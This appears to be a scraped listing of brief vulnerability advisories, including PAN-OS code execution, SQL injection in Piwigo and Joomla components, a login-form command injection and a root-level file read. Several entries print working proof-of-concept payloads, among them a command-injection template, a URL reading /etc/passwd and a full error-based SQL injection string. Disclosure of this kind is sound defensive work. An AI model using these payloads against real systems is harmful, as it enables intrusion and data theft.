When the User or Attacker insert any strings in the login form he/she will get this POST request. The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….)
Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
This module generates an DDE command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server.
SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter in the comments or status page to cat_options.php.
The vulnerability allows an attacker to inject sql commands by manipulating the 'txtname' parameter of the 'frmlogin' form.
The vulnerability allows an attacker to inject sql commands into the search parameter of the application. Proof of Concept: An attacker can send a crafted SQL query to the search parameter of the application in order to execute malicious SQL commands.
The vulnerability allows an attacker to inject sql commands by manipulating the 'uid' parameter in 'userview.php' script, the 'fnum' parameter in 'viewemcamp.php' script and the 'fn' parameter in 'viewvisitcamp.php' script.
The vulnerability implication allows an attacker to inject html code into the vulnerable parameter comment.
It is possible to read arbitrary file on the system with root permissions. Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: 1) http://localhost/[PATH]/index.php?option=com_jevideogallery&view=category&id=99[SQL] 99%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e,0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
Services By CQR